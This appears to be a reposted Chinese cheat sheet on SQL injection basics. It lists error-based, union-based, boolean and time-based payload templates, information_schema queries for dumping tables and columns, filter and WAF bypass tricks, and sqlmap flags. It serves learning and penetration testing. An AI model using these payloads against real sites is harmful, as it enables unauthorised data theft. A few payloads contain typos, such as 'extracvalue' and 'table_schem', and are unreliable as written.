sql注入知识点整理（基础版）

基本步骤

判断是否报错 判断闭合符号 判断注入类型 构建payload 手工注入或者编写脚本

基本注入类型

报错型注入 floor公式（结果多出一个1）：and (select 1 from (select count(*),concat((payload),floor(rand(0)*2))x from information_schema.tables group by x)a) extractvalue公式（首尾各有一个波浪号）：and extracvalue(1,concat(0x7e,(payload),0x7e) 布尔型注入 联合查询语句 回显点查询：UNION SELECT 1,2,3; 延时注入

其他注入技巧

HPP绕过WAF 宽字节注入绕过引号过滤 CHAR函数绕过引号过滤 ||与&&绕过and和or的过滤 分割字符绕过一次字符串过滤 二次注入 Linux特殊字符绕过空格过滤 括号法绕过空格过滤

常用SQL语句与函数

取子字符串：mid(string, start, length) 取子字符串：left(string, length) 取ASCII：ascii(char) 查询当前数据库：database() 查询当前用户：user() 当前数据库版本：@@version 数据库文件路径：@@datadir 爆表：select table_name from information_schema.tables where table_schema='database' 爆库：select column_name from information_schema.columns where table_schem='database' and table_name='table' 字符串连接：concat() 字符串按组输出：group_concat() 按照分隔符连接：concat_ws(char,...) 字段数猜解：ORDER BY x

sqlmap使用基础

-u指定url -p指定参数 -D指定数据库 -T指定表 -C指定字段 --current-db当前数据库 --current-user当前用户 --dbs查询所有数据库 --tables查询所有表 --columns查询所有字段名 --dump查询记录 --techniques X(X=B布尔型，E报错型，U联合注入型，T延迟型)：指定注入类型

注意点

一些特殊符号需要编码，如& +在GET参数中会变成空格  

转载于:https://www.cnblogs.com/tiumo/p/11222154.html

相关资源：JAVA上百实例源码以及开源项目